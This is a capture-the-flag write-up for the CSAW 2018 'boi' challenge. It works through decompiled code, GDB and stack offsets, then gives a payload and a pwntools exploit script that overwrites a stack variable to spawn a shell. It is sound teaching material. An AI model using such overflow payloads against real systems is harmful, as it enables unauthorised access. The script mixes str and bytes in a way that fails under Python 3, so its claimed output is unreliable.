Csaw 2018 Quals Boi (64-bit)

nightmare/modules/04-bof_variable/csaw18_boi/boi at master · guyinatuxedo/nightmareGitHub

1. Analysis

1.1 Basic

$ pwn checksec boi
[*] '/path/to/binary/boi'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled

$ ./boi
Are you a big boiiiii??
hello # input
Fri Dec 19 03:06:14 PM +08 2025

a. From the pwn checksec command, we know the following:

64-bit
Partial RELRO
Stack canary present
NX enabled
No PIE

b. After running the binary, we know that the program simply prints the line Are you a big boiiiiii??, and waits for an input. If the input is incorrect (speculation, to be confirmed later on), it will output the current date and time.

1.2 Ghidra

`main` function (Decompile view)

main

undefined8 main(void)

{
  long in_FS_OFFSET;
  undefined8 local_38;
  undefined8 local_30;
  undefined4 local_28;
  int iStack_24;
  undefined4 local_20;
  long local_10;
  
  local_10 = *(long *)(in_FS_OFFSET + 0x28);
  local_38 = 0;
  local_30 = 0;
  local_20 = 0;
  local_28 = 0;
  iStack_24 = -0x21524111;
  puts("Are you a big boiiiii??");
  read(0,&local_38,0x18);
  if (iStack_24 == -0x350c4512) {
    run_cmd("/bin/bash");
  }
  else {
    run_cmd("/bin/date");
  }
  if (local_10 != *(long *)(in_FS_OFFSET + 0x28)) {
                    /* WARNING: Subroutine does not return */
    __stack_chk_fail();
  }
  return 0;
}

Refined `main` function

undefined8 main(void)
{
  long in_FS_OFFSET;
  undefined8 input;
  undefined8 local_30;
  undefined4 local_28;
  int target;
  undefined4 local_20;
  long local_10;
  
  local_10 = *(long *)(in_FS_OFFSET + 0x28);
  input = 0;
  local_30 = 0;
  local_20 = 0;
  local_28 = 0;
  target = -0x21524111;
  puts("Are you a big boiiiii??");
  read(0,&input,0x18);
  if (target == -0x350c4512) {
    run_cmd("/bin/bash");
  }
  else {
    run_cmd("/bin/date");
  }
  if (local_10 != *(long *)(in_FS_OFFSET + 0x28)) {
                    /* WARNING: Subroutine does not return */
    __stack_chk_fail();
  }
  return 0;
}

From this, we know that the program reads in 0x18 (24) bytes of data from the user into the input variable. Next, it checks if the target variable matches a certain value (-0x350c4512). If it matches, run /bin/bash, else run /bin/date.

Variables (Listing view)

We can see that the input is stored lower in the stack at offset -0x38, while the target variable is stored higher at offset -0x24. This makes the input variable 0x38 - 0x24 = 0x14 bytes lower than the target variable. This means that given the proper payload, we can overwrite the value of the target variable in the stack with the matching value.

Remember that the read function defined earlier allows us to write 0x18 into the input variable

The assembly instruction corresponding to the IF statement:

if (target == -0x350c4512) {
...

004006a8 3d ee ba        CMP        EAX,0xcaf3baee
         f3 ca

This means that we have to overwrite the target variable value in stack with 0xcaf3baee. Since we are able to write 0x18 bytes of data, while the offset between the input and target is 0x14 bytes, we will be able to achieve this

1.3 GDB

Since there is no PIE enabled, we can skip the starti, which will usually be required to load the runtime addresses.

$ gdb boi
gdb> disass main
Dump of assembler code for function main:
   0x0000000000400641 <+0>:     push   rbp
   0x0000000000400642 <+1>:     mov    rbp,rsp
   0x0000000000400645 <+4>:     sub    rsp,0x40
   0x0000000000400649 <+8>:     mov    DWORD PTR [rbp-0x34],edi
   0x000000000040064c <+11>:    mov    QWORD PTR [rbp-0x40],rsi
   0x0000000000400650 <+15>:    mov    rax,QWORD PTR fs:0x28
   0x0000000000400659 <+24>:    mov    QWORD PTR [rbp-0x8],rax
   0x000000000040065d <+28>:    xor    eax,eax
   0x000000000040065f <+30>:    mov    QWORD PTR [rbp-0x30],0x0
   0x0000000000400667 <+38>:    mov    QWORD PTR [rbp-0x28],0x0
   0x000000000040066f <+46>:    mov    QWORD PTR [rbp-0x20],0x0
   0x0000000000400677 <+54>:    mov    DWORD PTR [rbp-0x18],0x0
   0x000000000040067e <+61>:    mov    DWORD PTR [rbp-0x1c],0xdeadbeef
   0x0000000000400685 <+68>:    mov    edi,0x400764
   0x000000000040068a <+73>:    call   0x4004d0 <puts@plt>
   0x000000000040068f <+78>:    lea    rax,[rbp-0x30]
   0x0000000000400693 <+82>:    mov    edx,0x18
   0x0000000000400698 <+87>:    mov    rsi,rax
   0x000000000040069b <+90>:    mov    edi,0x0
   0x00000000004006a0 <+95>:    call   0x400500 <read@plt>
   0x00000000004006a5 <+100>:   mov    eax,DWORD PTR [rbp-0x1c]
   0x00000000004006a8 <+103>:   cmp    eax,0xcaf3baee
   0x00000000004006ad <+108>:   jne    0x4006bb <main+122>
   0x00000000004006af <+110>:   mov    edi,0x40077c
   0x00000000004006b4 <+115>:   call   0x400626 <run_cmd>
   0x00000000004006b9 <+120>:   jmp    0x4006c5 <main+132>
   0x00000000004006bb <+122>:   mov    edi,0x400786
   0x00000000004006c0 <+127>:   call   0x400626 <run_cmd>
   0x00000000004006c5 <+132>:   mov    eax,0x0
   0x00000000004006ca <+137>:   mov    rcx,QWORD PTR [rbp-0x8]
   0x00000000004006ce <+141>:   xor    rcx,QWORD PTR fs:0x28
   0x00000000004006d7 <+150>:   je     0x4006de <main+157>
   0x00000000004006d9 <+152>:   call   0x4004e0 <__stack_chk_fail@plt>
   0x00000000004006de <+157>:   leave
   0x00000000004006df <+158>:   ret
End of assembler dump.

Lets focus on the following 2 lines, which corresponds to the read function, and the subsequent IF comparison statement:

0x00000000004006a0 <+95>:    call   0x400500 <read@plt>
0x00000000004006a5 <+100>:   mov    eax,DWORD PTR [rbp-0x1c]
0x00000000004006a8 <+103>:   cmp    eax,0xcaf3baee

We can set a breakpoint on the 3rd line (0x00000000004006a8), and view the eax register

The breakpoint value simply runs the program till the point where the user inputs a value, before the value at the portion of the stack (target variable) is moved to the eax register

gdb> break *0x00000000004006a8
gdb> run
hello # input
gdb> info r eax
eax            0xdeadbeef          -559038737

As of now, it contains the value 0xdeadbeef. Now, lets use the payload ` to write the value 0xcaf3baee into the target variable:

# create the payload
$ python3 - << 'EOF' > boi-input.bin
import sys
sys.stdout.buffer.write(b'0'*0x14 + b"\xee\xba\xf3\xca")
EOF

# OR simply
$ python -c 'print "0"*0x14 + "\xee\xba\xf3\xca"' > boi-input.bin

gdb> break *0x00000000004006a8
gdb> run < boi-input.bin
gdb> info r eax
eax            0xcaf3baee          -889996562

We can see that the eax register now contains the value 0xcaf3baee

2. Exploit script

boi-exploit.py

from pwn import *

# establish the target binary process
target = process('./boi')

# create the payload according to what we tested earlier
payload = "0"*0x14 + b"\xee\xba\xf3\xca" # p32(0xcaf3baee) work too 

# send the payload
target.send(payload)

# drop to an interactive shell
target.interactive()

$ python3 boi-exploit.py 
[+] Starting local process './boi': pid 81673
[*] Switching to interactive mode
Are you a big boiiiii??
$ whoami
jarrettgxz

When we execute the exploit, we will pass the checks, and the program will pop a shell for us with the /bin/bash command

pwnlib.util.packing — Packing and unpacking of strings — pwntools 4.15.0 documentationdocs.pwntools.com

PreviousStack-based overflow NextTamu19 pwn1 (32-bit)

Last updated 1 month ago

hashtag1. Analysis

hashtag1.1 Basic

hashtag1.2 Ghidra

hashtagmain function (Decompile view)

hashtagRefined main function

hashtagVariables (Listing view)

hashtag1.3 GDB

hashtag2. Exploit script